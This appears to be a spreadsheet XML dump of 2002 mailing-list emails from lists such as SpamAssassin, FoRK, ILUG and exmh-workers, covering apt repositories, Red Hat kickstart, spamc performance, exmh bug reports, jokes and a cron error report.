    <t>To: rpm-zzzlist@freshrpms.net\nFrom: "" Angles " Puglisi" &lt;angles@aminvestments.com&gt;\nDate: Wed, 24 Jul 2002 07:50:51 +0000</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 07:50:51 +0000</t>
  </si>
  <si>
    <t>Re: Ximian apt repos?</t>
  </si>
  <si>
    <t>Lance (lance_tt@bellsouth.net) wrote*: &gt; &gt;well, from the looks of things, Evolution mail client isn't supported &gt;just yet, so I reckon I'll wait a bit.  Whoever posted these gnome2 apt &gt;repositories, thanks!!! &gt; I'm uising Havoc Pennington's Gnomehide and it rocks. I installed it before I knew about apt, but one of the previous emails had an apt repository that claimed to have gnomehide. Just remember there is one kew file that makes the difference between Gnome1 and Gnome2 being used. I *think* it is "gnome-core" vs. "gnome-session" but I can not remember. Note that that those same files are probably in the Limbo beta, except updated. There has not been a major change to "gnomehide" in a while, I suspect Havoc's work went into Limbo then. -- That's "angle" as in geometry. _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: "Joseph S. Barrera III" &lt;joe@barrera.org&gt;,\nFrom: Udhay Shankar N &lt;udhay@pobox.com&gt;\nDate: Wed, 24 Jul 2002 07:50:21 +0530</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 07:50:21 +0530</t>
  </si>
  <si>
    <t>Udhay Shankar N &lt;udhay@pobox.com&gt;</t>
  </si>
  <si>
    <t>"Joseph S. Barrera III" &lt;joe@barrera.org&gt;,</t>
  </si>
  <si>
    <t>Re: spam maps</t>
  </si>
  <si>
    <t>At 08:58 AM 7/23/02 -0700, Joseph S. Barrera III wrote:\n\n&gt;And you. I especially hate you.\n\nHeh. The name of the band is SO appropriate...:)\n\n[URL]http://www.purelyrics.com[/URL]\n\nI, hate the rain and sunny weather\nAnd I, hate the beach and moutains too\n(and) I don't like a thing about the city, no, no\nAnd I, I, I, hate the country side too!\n\nAnd I, hate everything about you!\n...everything about you!\n\nI don't like a thing about your mother\nAnd I, I hate your daddy's guts too\nI, don't like a thing about your sister\n'cause I, I, I, think sex is overrated too.\n\nAnd I, get sick when I'm around, I, can't stand to be around\nI, hate everything about you!\n\neverything about you, everything about you, everything about\nyou\n\nSome say I got a bad attitude\nBut that don't change the way I feel about you\nAnd if you think this might be bringing me down\nLook again cause I ain't wearin' no frown!\n\nI don't really care about your sister\nFuck the little bitch 'cause I already kissed her\n\nOne thing that I did to your lady\nPut her on the bed and she didn't say maybe\nI know you know everybody knows\nThe way it comes, the way it's gonna' go\n\nYou think it's sad\nAnd that's too bad\n'cause I'm havin'\nA ball hatin'\nEvery little thing about you!\n\nEverything about you, everything about\nI get sick when I'm around\nI can't stand to be around\nI hate everything about you\n\n\n-- \n((Udhay Shankar N)) ((udhay @ pobox.com)) (([URL]www.digeratus.com[/URL]\n      God is silent. Now if we can only get Man to shut up.\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.purelyrics.com www.digeratus.com http://xent.com</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "Bill Kearney" &lt;wkearney99@hotmail.com&gt;\nDate: Wed, 24 Jul 2002 07:43:23 -0400</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 07:43:23 -0400</t>
  </si>
  <si>
    <t>"Bill Kearney" &lt;wkearney99@hotmail.com&gt;</t>
  </si>
  <si>
    <t>&gt; Turn it off! It not only risks silent false\n&gt; positives, but suffers them in such a way that\n&gt; individuals cannot adjust/detect/remedy them.\n\nBetter yet, start another list; fork-spam and forward the suspect items to it.\nMuch like the noarchive list.  This wouldn't be perfect but it'd be better than\nnothing at all.\n\n&gt; Usually I figure if I miss a FoRK post,\n&gt; no big deal, I'll pick it up by the replies if it's interesting.\n\n+1\n\n-Bill Kearney\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-devel@example.sourceforge.net\nFrom: Klaus Heinz &lt;k.heinz.jul.zwei@onlinehome.de&gt;\nDate: Wed, 24 Jul 2002 06:52:19 +0200</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 06:52:19 +0200</t>
  </si>
  <si>
    <t>Klaus Heinz &lt;k.heinz.jul.zwei@onlinehome.de&gt;</t>
  </si>
  <si>
    <t>Re: [SAdev] Scoring Yahoo Ads</t>
  </si>
  <si>
    <t>From: Matt Kettler  &gt; Hmm, I think that Marc, being one of the most active and prolific posters  &gt; to this list, certainly understands SA much better than most. Certainly  Frequency of messages does _not_ let you draw valid conclusions about the understanding of the issues at hand of the sender. IMHO it's sometimes even inversely proportional. &gt; Marc is an active and prolific contributor to SA (gee, look, his name's  &gt; even in the credit's page on the website!). This should not impress you so much. At one time I even detected my name on that page and I contributed less than a handful of rather simple rules. That's not to say I don't appreciate Marc's contributions to the effort. But in his place I would have (hopefully :) reevaluated my arguments in the face of, as I saw it, massive rejection of his idea what constitutes spam. Maybe this list can return to discussing technical topics. Politics should go to spamassassin-talk. ciao      Klaus ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Spamassassin-devel mailing list Spamassassin-devel@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: iiu-admin@taint.org\nFrom: iiu-admin@taint.org\nDate: Wed, 24 Jul 2002 05:33:01 +0100</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 05:33:01 +0100</t>
  </si>
  <si>
    <t>As list administrator, your authorization is requested for the\nfollowing mailing list posting:\n\n    List:    IIU@iiu.taint.org\n    From:    emailharvest@email.com\n    Subject: Harvest lots of E-mail addresses quickly !\n    Reason:  Post by non-member to a members-only list\n\nAt your convenience, visit:\n\n    [URL]http://iiu.taint.org[/URL]\n        \nto approve or deny the request.</t>
  </si>
  <si>
    <t>To: yyyy@dogma.slashnull.org\nFrom: root@dogma.slashnull.org (Cron Daemon)\nDate: Wed, 24 Jul 2002 03:25:40 +0100</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 03:25:40 +0100</t>
  </si>
  <si>
    <t>root@dogma.slashnull.org (Cron Daemon)</t>
  </si>
  <si>
    <t>yyyy@dogma.slashnull.org</t>
  </si>
  <si>
    <t>Cron &lt;yyyy@dogma&gt; /home/yyyy/lib/sitescooper/automatic/runme</t>
  </si>
  <si>
    <t>Some errors were encountered during tonight's sitescooper run: SERIOUS WARNINGS: ------------------------------------------------------------------------- SITE WARNING: "advogato_diaries.site" line 1: HTTP GET failed: 500 Can't connect to [URL]www.advogato.org[/URL] (Timeout) ([URL]http://www.advogato.org[/URL] SITE WARNING: "advogato.site" line 1: HTTP GET failed: 500 Can't connect to [URL]www.advogato.org[/URL] (Timeout) ([URL]http://www.advogato.org[/URL] SITE WARNING: "DOC.cf" line 6: Configuration line invalid (needs URL line first?): SITE WARNING: "DOC.cf" line 7: Configuration line invalid (needs URL line first?): SITE WARNING: "ISILO.cf" line 6: Configuration line invalid (needs URL line first?): SITE WARNING: "ISILO.cf" line 7: Configuration line invalid (needs URL line first?): SITE WARNING: "linux_gazette.site" line 3: Redirected to [URL]http://www.linuxgazette.com[/URL] from [URL]http://www.linuxgazette.com[/URL] SITE WARNING: "PLUCKER.cf" line 6: Configuration line invalid (needs URL line first?): SITE WARNING: "PLUCKER.cf" line 7: Configuration line invalid (needs URL line first?): SITE WARNING: "unblinking.site" line 11: Unrecognised: SITE WARNING: "world_new_york.site" line 1: HTTP GET failed: 404 Not Found ([URL]http://www.worldnewyork.org[/URL] SITE PATTERN CHANGED WARNINGS: ------------------------------------------------------------------------- SITE WARNING: "crypto_gram.site" line 1: LinksStart pattern "" not found in page [URL]http://www.counterpane.com[/URL] SITE WARNING: "freshmeat_articles.site" line 1: LinksStart pattern "-- Content --" not found in page [URL]http://freshmeat.net[/URL] SITE WARNING: "freshmeat.site" line 6: StoryStart pattern "" not found in page [URL]http://www.linux-mag.com[/URL] SITE WARNING: "linuxworld.site" line 3: LinksStart pattern "(?i)start features" not found in page [URL]http://www.linuxworld.com[/URL] SITE WARNING: "mandrakeforum.site" line 1: LinksStart pattern "START: Body" not found in page [URL]http://www.mandrakeforum.com[/URL] SITE WARNING: "merlyns_columns.site" line 1: LinksStart pattern "Columns" not found in page [URL]http://www.stonehenge.com[/URL] SITE WARNING: "merlyns_columns.site" line 1: LinksStart pattern "Columns" not found in page [URL]http://www.stonehenge.com[/URL] SITE WARNING: "plastic.site" line 1: LinksStart pattern "begin index block" not found in page [URL]http://www.plastic.com[/URL] SITE WARNING: "sitescooper_archive.site" line 5: LinksStart pattern "date" not found in page [URL]http://groups.yahoo.com[/URL] SITE WARNING: "slashdot.site" line 7: LinksStart pattern "Â hof" not found in page [URL]http://slashdot.org[/URL] SITE WARNING: "tbtf_log.site" line 3: StoryStart pattern "-- created by Blogger! --" not found in page [URL]http://tbtf.com[/URL] SITE WARNING: "the_onion.site" line 5: LinksStart pattern "" not found in page [URL]http://www.theregister.co.uk[/URL] SITE WARNING: "user_friendly.site" line 2: StoryStart pattern "" not found in page [URL]http://www.userfriendly.org[/URL] SITE WARNING: "weekly_news.site" line 1: LinksStart pattern "-- Leading stuff goes here --" not found in page [URL]http://www.lwn.net[/URL]</t>
  </si>
  <si>
    <t>www.advogato.org http://www.advogato.org www.advogato.org http://www.advogato.org http://www.linuxgazette.com http://www.linuxgazette.com http://www.worldnewyork.org http://www.counterpane.com http://freshmeat.net http://www.linux-mag.com http://www.linuxworld.com http://www.mandrakeforum.com http://www.stonehenge.com http://www.stonehenge.com http://www.plastic.com http://groups.yahoo.com http://slashdot.org http://tbtf.com http://www.theregister.co.uk http://www.userfriendly.org http://www.lwn.net</t>
  </si>
  <si>
    <t>To: Gary Lawrence Murphy &lt;garym@canada.com&gt;\nFrom: CDale &lt;cdale@techmonkeys.net&gt;\nDate: Wed, 24 Jul 2002 03:12:20 -0500 (CDT)</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 03:12:20 -0500 (CDT)</t>
  </si>
  <si>
    <t>Gary Lawrence Murphy &lt;garym@canada.com&gt;</t>
  </si>
  <si>
    <t>I have a similar one:\nBubba calls up the DEA and tells em that JoeBob is growing pot and \nhiding it in his back yard.  They go over, find nothing, and go ask Bubba \nwhat he was talking about.  Bubba tells em it's in JoeBob's woodpile.  So \nthey go chop up all the wood and look through it and scatter it all over \nthe yard, but find nothing.  They ask Bubba again, and he tells them that \nJoeBob must have already sold it, so they leave.  Bubba calls up JoeBob:\nBubba: You get your wood chopped?'\nJoeBob: Yep, thanks, I'll give ya 15 bucks tomorrow.  (:\n\nsillyhead\n\nOn 23 Jul 2002, Gary Lawrence Murphy wrote:\n\n&gt; \n&gt; You're in luck because my mom sends these all the time and I never\n&gt; have anything else to do with them ...\n&gt; \n&gt;  An old man lived alone in Minnesota. He wanted to spade his potato garden,\n&gt; but it was very hard work.\n&gt;  His only son, who would have helped him, was in Prison. The old man  wrote\n&gt; a  letter to his son and mentioned his predicament.\n&gt;  Shortly, he received this reply, "For heaven's sake Dad, don't dig up  that\n&gt; garden, that's where I buried the GUNS!"\n&gt;  At 4 A.M. the next morning, a dozen police showed up and dug up the old\n&gt; man's entire garden, without finding any guns.\n&gt;  Confused, the old man wrote another note to his son telling him what\n&gt; happened, and asking him what to do next.\n&gt;  His son's reply was: "Now plant your potatoes, Dad. It's the best\n&gt; I could  do  at this time."\n&gt; \n&gt; but better than that, just settle into this, courtesy of daypop:\n&gt; [URL]http://xroads.virginia.edu[/URL]\n&gt; \n&gt; \n\n-- \n"My theology, briefly, is that the universe was dictated but not\n          signed."  (Christopher Morley) \n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://xroads.virginia.edu http://xent.com</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Wed, 24 Jul 2002 02:00:29 +0000</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 02:00:29 +0000</t>
  </si>
  <si>
    <t>[use Perl] Stories for 2002-07-24</t>
  </si>
  <si>
    <t>use Perl Daily Newsletter\n\nIn this issue:\n    * Book Review: Web Development with Apache and Perl\n\n+--------------------------------------------------------------------+\n| Book Review: Web Development with Apache and Perl                  |\n|   posted by pudge on Tuesday July 23, @00:26 (books)               |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\n[0]belg4mit writes "I picked up [1]Web Development with Apache and Perl\nthinking it would be about mod_perl, in my mind Apache + perl = mod_perl.\nIt's not."\n\nThis story continues at:\n    [URL]http://use.perl.org[/URL]\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\nLinks:\n    0. http:///pthbb.org/\n    1. [URL]http://manning.com[/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 http://manning.com http://use.perl.org</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Wed, 24 Jul 2002 02:00:23 +0000</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 02:00:23 +0000</t>
  </si>
  <si>
    <t>[use Perl] Headlines for 2002-07-24</t>
  </si>
  <si>
    <t>use Perl Daily Headline Mailer\n\nBook Review: Web Development with Apache and Perl\n    posted by pudge on Tuesday July 23, @00:26 (book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SpamAssassin Talk ML &lt;spamassassin-talk@example.sourceforge.net&gt;\nFrom: "Malte S. Stretz" &lt;msquadrat.nospamplease@gmx.net&gt;\nDate: Wed, 24 Jul 2002 01:42:23 +0200</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 01:42:23 +0200</t>
  </si>
  <si>
    <t>SpamAssassin Talk ML &lt;spamassassin-talk@example.sourceforge.net&gt;</t>
  </si>
  <si>
    <t>[SAtalk] Why not upgrade to 2.40 today? (was: Re: [Fwd: Re: [Razor-users] can't find Razor/Client.pm])</t>
  </si>
  <si>
    <t>On Wednesday 24 July 2002 01:13 CET Theo Van Dinter wrote:\n&gt; On Tue, Jul 23, 2002 at 03:55:35PM -0700, Kevin Gagel wrote:\n&gt; &gt; I'm thinking of following this advise too. Is there a good reason that\n&gt; &gt; I should not upgrad to the 2.40 at this time?\n&gt;\n&gt; Unless you feel like doing some development, the answer is: it's not\n&gt; released and is considered "use at your own risk".   :)\n\nAnd maybe because there isn't an official 2.40 yet. It's 2.40-cvs and \nchanges from day to day. Or, to cite the page [1]: "these are built nightly \nfrom CVS. They may be unstable!". One and a half good reason :o)\n\nMalte\n\n[1][URL]http://spamassassin.org[/URL]\n\n-- \n-- Coding is art.\n-- \n\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://spamassassin.org http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: terry@ccis.net\nDate: Wed, 24 Jul 2002 01:01:04 -0400</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 01:01:04 -0400</t>
  </si>
  <si>
    <t>terry@ccis.net</t>
  </si>
  <si>
    <t>[SAtalk] Terry Ryan/Chesco is out of the office.</t>
  </si>
  <si>
    <t>I will be out of the office starting  07/20/2002 and will not return until\n07/29/2002.\n\nI will respond to your message when I return. If there is an immediate need\nto contact a CCIS representative, you can call our office at 610-518-5700.\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: harley@argote.ch (Robert Harley)\nDate: Wed, 24 Jul 2002 00:48:02 +0200 (CEST)</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 00:48:02 +0200 (CEST)</t>
  </si>
  <si>
    <t>My brain hurts</t>
  </si>
  <si>
    <t>Working too hard...\n\nSomeone tell me a joke, or email me a beer or something...\n\nTIA,\n  Rob.\n     .-.                    Robert.Harley@argote.ch                    .-.\n    /   \           .-.      Software Development       .-.           /   \\n   /     \         /   \       .-.     _     .-.       /   \         /     \\n  /       \       /     \     /   \   / \   /   \     /     \       /       \\n /         \     /       \   /     `-'   `-'     \   /       \     /         \\n            \   /         `-'       ArgoTech      `-'         \   /\n             `-'                [URL]http://argote.ch[/URL]              `-'\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Roy-Magne Mo &lt;rmo@sunnmore.net&gt;\nDate: Wed, 24 Jul 2002 00:18:27 +0200</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 00:18:27 +0200</t>
  </si>
  <si>
    <t>Roy-Magne Mo &lt;rmo@sunnmore.net&gt;</t>
  </si>
  <si>
    <t>apt repository for irssi</t>
  </si>
  <si>
    <t>Seems like irssi.org also has an apt-rpm repository for snapshots of irssi: rpm [URL]http://ninja.no[/URL] 7.3/i386 irssi rpm-src [URL]http://ninja.no[/URL] 7.3/i386 irssi _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Ivan Kelly &lt;ivan@ivankelly.net&gt;\nDate: Wed, 21 Aug 2002 22:21:51 +0000</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 22:21:51 +0000</t>
  </si>
  <si>
    <t>Ivan Kelly &lt;ivan@ivankelly.net&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] dial-on-demand</t>
  </si>
  <si>
    <t>On Wed, Aug 21, 2002 at 02:52:11PM +0800, al@mpsc.ph wrote: &gt; Could you please help me how to set up a dial-on-demand, what are the &gt; packages needed, &gt; and other requirements to get on. depends on what you are using to dial. for debian put "demand" in /etc/ppp/peers/. use "idle 600" to set the timeout to 10 minutes(600 secs). im not sure where exactly to put it for other distros. whereever pppd gets it options from. regards --  Ivan Kelly ivan@ivankelly.net -----BEGIN GEEK CODE BLOCK----- Version: 3.12 GCS d- s+: a--- C++ UL++++ P+++ L+++ E--- W++ N+ o-- K- w---  O-- M-- V-- PS+++ PE- Y+ PGP++ t+ 5 X++ R tv+ b+ DI+ D++  G e h! r-- y+  ------END GEEK CODE BLOCK------ --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: deccy@csn.ul.ie (Declan Houlihan)\nDate: Wed, 21 Aug 2002 20:15:54 +0100</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 20:15:54 +0100</t>
  </si>
  <si>
    <t>deccy@csn.ul.ie (Declan Houlihan)</t>
  </si>
  <si>
    <t>[ILUG] redhat kickstart</t>
  </si>
  <si>
    <t>How many Redhat admins out there use the redhat kickstart?\nIf you don't use it, how do you install redhat on all your \nworkstations, do you do it by hand, with the cds?\n\nAs we are looking at using Linux at work, I'm looking\ninto setting up the kickstart. There doesn't seem to\nbe a lot of documentation around about it.\n\nDoes anybody know if it would be possible to do the following:\nGet the machine to boot using DHCP and read it's kickstart\nconfig file from teh DHCP server and in this config file\nhave the machine configured to use a static IP, so that when\nthe machine is rebooted it will come up with it's new IP.\n\nAlso, There was no driver on the redhat network install flopopy\nfor the network card in the machine I'm installing. This required\nme to uncompress the floppy image, loop mount it, add in the module\nfor the network card and compress it all up again. I'm not going\nto be able to do this every time we get a new machine, I was\nwondering if instead of having a boot floppy, you could use a boot\ncdrom, but just for the purpose of having all the network card\nmodules on the cdrom. I'd still want it to get the packages from\nan NFS server on the network.\n\nAny help with this would be greatly appreciated,\ncheers,\ndeccy.\n\n-- \n---------------------------------------\nDeclan Houlihan\ndeccy@csn.ul.ie\n[URL]http://deccy.csn.ul.ie[/URL]\n---------------------------------------\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://deccy.csn.ul.ie http://www.linux.ie</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: Stephane Lentz &lt;Stephane.Lentz@ansf.alcatel.fr&gt;\nDate: Wed, 21 Aug 2002 19:55:29 +0200</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 19:55:29 +0200</t>
  </si>
  <si>
    <t>Stephane Lentz &lt;Stephane.Lentz@ansf.alcatel.fr&gt;</t>
  </si>
  <si>
    <t>Re: [SAtalk] spamc processes</t>
  </si>
  <si>
    <t>On Wed, Aug 21, 2002 at 11:26:13AM -0500, brad angelcyk wrote:\n&gt; \n&gt; \n&gt; Hi,\n&gt; \n&gt; I have been using SpamAssassin for a few weeks, and I have noticed that\n&gt; the speed of scanning of email has drastically reduced since we switched\n&gt; to it.  My configuration is Sendmail 8.12.3 with SA 2.31 (using the\n&gt; spamass-milter sendmail milter).  There are 125 spamc processes running\n&gt; right now, and there were about 109 an hour ago.  They don't seem to be\n&gt; clearing up.  Does anybody have any information on what I can do?\n&gt; \n&gt; Thanks,\n&gt; Brad\n&gt; \nthe check_local tarball includes a program called miltrassassin.\nIt's a C Milter program speaking the SPAMD protocol so it will be\nfar more efficient than spamass-milter.\nCheck [URL]http://www.digitalanswers.org[/URL]\nfor some details about miltrassassin.                                                                                                                                                                     \nThe check_local tarball can be downloaded on\n[URL]http://www.digitalanswers.org[/URL]\n\nAnother alternative solution is to use Mimedefang : it offers\nanti-spam, attachment defanging, custom filtering.\n\nregards, \n\nSL/\n\n---\nStephane Lentz / Alcanet International - Internet Services\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http://www.digitalanswers.org http://www.digitalanswers.org https://www.inphonic.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: webdev@linux.ie\nFrom: elvin@eircom.net\nDate: Wed, 21 Aug 2002 19:44:28 +0100</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 19:44:28 +0100</t>
  </si>
  <si>
    <t>elvin@eircom.net</t>
  </si>
  <si>
    <t>webdev@linux.ie</t>
  </si>
  <si>
    <t>[Webdev] PHP/MySQL Virtual Hosting Recommendations?</t>
  </si>
  <si>
    <t>Hi,\n\nI am looking at the options for a UNIX/Linux Virtual Server capable of holding multiple domains - preferably not tooo expensive as I am not a business. I wish to build a few PHP/MySQL sites and host them...\n\nA rough list of features I am after are\n\nCirca 50MB-100MB web space for now\nPOP email accounts \nAccount Control Panel \nPerl \nPHP \nMySQL \nFTP and Telnet Access 24/7\nOwn CGI-BIN\nWebalizer Graphical Stats \nServer Side Includes \nGood Reachable Technical Support\n\nI have seen a great looking 300MB solution in the region of 600Euro p.a. which at the moment is a bit over my financial head in one payment - I haven't completed any sites yet, but have a few potential jobs coming up.\n\nAny tips/pointers much appreciated!\n\nRegards,\nElvin \n\n\n\n_______________________________________________\nWebdev mailing list\nWebdev@linux.ie\n[URL]http://www.linux.ie[/URL]</t>
  </si>
  <si>
    <t>To: Chris Garrigues &lt;cwg-dated-1030314468.7c7c85@DeepEddy.Com&gt;\nFrom: Robert Elz &lt;kre@munnari.OZ.AU&gt;\nDate: Wed, 21 Aug 2002 19:30:01 +0700</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 19:30:01 +0700</t>
  </si>
  <si>
    <t>Chris Garrigues &lt;cwg-dated-1030314468.7c7c85@DeepEddy.Com&gt;</t>
  </si>
  <si>
    <t>Date:        Tue, 20 Aug 2002 17:27:47 -0500     From:        Chris Garrigues      Message-ID:  &lt;1029882468.3116.TMDA@deepeddy.vircio.com&gt;   | I'm hoping that all people with no additional sequences will notice are   | purely cosmetic changes. Well, first, when exmh (the latest one with your changes) starts, I get... can't read "flist(totalcount,unseen)": no such element in array     while executing "if {$flist(totalcount,$mhProfile(unseen-sequence)) &gt; 0} { 	FlagInner spool iconspool labelup     } else { 	FlagInner down icondown labeldown     }"     (procedure "Flag_MsgSeen" line 3)     invoked from within "Flag_MsgSeen"     (procedure "MsgSeen" line 8)     invoked from within "MsgSeen $msgid"     (procedure "MsgShow" line 12)     invoked from within "MsgShow $msgid"     (procedure "MsgChange" line 17)     invoked from within "MsgChange 4862 show"     invoked from within "time [list MsgChange $msgid $show"     (procedure "Msg_Change" line 3)     invoked from within "Msg_Change $msg(id) $show"     (procedure "Msg_Show" line 7)     invoked from within "Msg_Show cur"     ("eval" body line 1)     invoked from within "eval $msgShowProc"     (procedure "FolderChange" line 55)     invoked from within "FolderChange inbox {Msg_Show cur}"     invoked from within "time [list  FolderChange $folder $msgShowProc"     (procedure "Folder_Change" line 3)     invoked from within "Folder_Change $exmh(folder)"     (procedure "Exmh" line 101)     invoked from within "Exmh"     ("after" script) which is probably related to my not having an "unseen" sequence anywhere (certainly not in inbox) - I read all of my outstanding mail before I tried this new exmh ... Second, I've been used to having a key binding which was to Msg_MarkUnseen which doesn't seem to exist any more, and I'm not sure what I should replace that with.   There's obviously a way as the "Sequences" menu does this. The "Mark Unseen" menu entry in the message "More" menu is still wanting that function as well...   | For those who have other sequences defined, the window will widen to   | display the other sequences. Any chance of having that lengthen instead?   I like all my exmh stuff in nice columns (fits the display better).   That is, I use the detached folder list, one column.   The main exmh window takes up full screen, top to bottom, but less than half the width, etc... I have space for more sequences, in the "unseen" window, as long as they remain once nice narrow window (best would be if the sequences could be ordered by some preference, then ones which didn't fit would just fall off the bottom, and not be shown). I'd also prefer it if that window had no unusual background colouring, just one constant colour - I have been running the unseen window with background black, on a root window that is all black, with no borders or other decorations, but made "sticky" - the appearance is just like the folders with unseen messages (and their counts) are written into the root window (because it is sticky, this small display follows me around and do I can see when new mail needs processing). I also find that I tend to have a bunch of sequences that only ever occur in one folder (some I had forgotten I ever created).  So in addition to the "sequences to always show" and "sequences to never show", a preference to only show sequences that occur in more than one folder would be useful, and then have the sequences that occor only in the folder I'm visiting appear in the list when that folder is current. This is just to keep the list size somewhat manageable while remaining productive (I quite often use a sequence to remember a particular message in a folder - the name is used only there, and only for one message, it gives me a handle on the message which remains as the folder is packed, sorted, etc). I haven't updated my exmh for some time now, so I'm not sure if this next one is new, or just new since 2.5, but the Sequences menu (on the bar with New Flist Search ...) only contains "unseen" and "urgent". It would be useful if it contained all of the sequences that the folder happens to have defined.   A "New sequence" entry would also be useful (to mark the message with a sequence name that didn't previously exist, which can be done now using "Search" and the pick interface, but is clumsy that way) Actually, you once could, now when I try this, entering a sequence name in the pick box, and a single message number, or a range N-N in the list of messages, and no pick attributes at all, I now get ... syntax error in expression "int(1+1+(1 hit-1)*(3868-1-2)/(4878-1))"     while executing "expr int($minlineno+1+($msgid-$minmsgid)*($maxlineno-$minlineno-2)/($maxmsgid-$minmsgid))"     (procedure "Ftoc_FindMsg" line 46)     invoked from within "Ftoc_FindMsg $msg"     (procedure "Ftoc_FindMsgs" line 5)     invoked from within "Ftoc_FindMsgs $msgids"     (procedure "Ftoc_PickMsgs" line 5)     invoked from within "Ftoc_PickMsgs $pick(ids) $pick(addtosel)"     (procedure "PickInner" line 13)     invoked from within "PickInner {exec pick +inbox -list} {4852 -sequence mercury}"     ("uplevel" body line 1)     invoked from within "uplevel #0 $cmd"     (procedure "busyCursorInner" line 8)     invoked from within "busyCursorInner $cmd $widgets"     (procedure "busyCursorHack" line 32)     invoked from within "busyCursorHack $args"     ("cursor" arm line 1)     invoked from within "switch $busy(style) { 	icon		{busyIcon $args} 	cursorAll	{busyCursor $args} 	cursor		{busyCursorHack $args} 	default		{eval $args}     }"     (procedure "busy" line 3)     invoked from within "busy PickInner $cmd $msgs"     (procedure "Pick_It" line 51)     invoked from within "Pick_It"     invoked from within ".pick.but.pick invoke"     ("uplevel" body line 1)     invoked from within "uplevel #0 [list $w invoke]"     (procedure "tkButtonUp" line 7)     invoked from within "tkButtonUp .pick.but.pick "     (command bound to event) It has been ages since I did this last though.   I tried adding a Subject to pick on (easy as I know what's in the message...) which made no difference. Looks as if something is now saying "1 hit" when before it didn't, or similar.   | I've also changed the ftoc colorization as discussed briefly on the list a    | week or so ago. Any chance of making the current message a little brighter background? Just to make it stand out a fraction more than it does (maybe this is more apparent to me than many, as I use very small fonts everywhere, the background of the ftoc line isn't very wide). Hope this helps. kre _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: "Gordon Mohr" &lt;gojomo@usa.net&gt;\nFrom: yyyy@spamassassin.taint.org (Justin Mason)\nDate: Wed, 21 Aug 2002 18:10:29 +0100</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 18:10:29 +0100</t>
  </si>
  <si>
    <t>Re: The Curse of India's Socialism</t>
  </si>
  <si>
    <t>"Gordon Mohr" said:\n\n&gt; If you plan to spend most of your time in that broke/\n&gt; unemployed/unexceptional mode, please, leave North America \n&gt; for Scandinavia. \n\nhmm, I might, at least they've got affordable DSL there, and haven't\nsigned a DMCA-like law yet ;)\n\n--j.\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: "Hess, Mtodd, /mth" &lt;mth@Ingersoll.com&gt;\nFrom: Matt Sergeant &lt;msergeant@startechgroup.co.uk&gt;\nDate: Wed, 21 Aug 2002 18:02:54 +0100</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 18:02:54 +0100</t>
  </si>
  <si>
    <t>Matt Sergeant &lt;msergeant@startechgroup.co.uk&gt;</t>
  </si>
  <si>
    <t>Re: [SAtalk] paulgraham.com article</t>
  </si>
  <si>
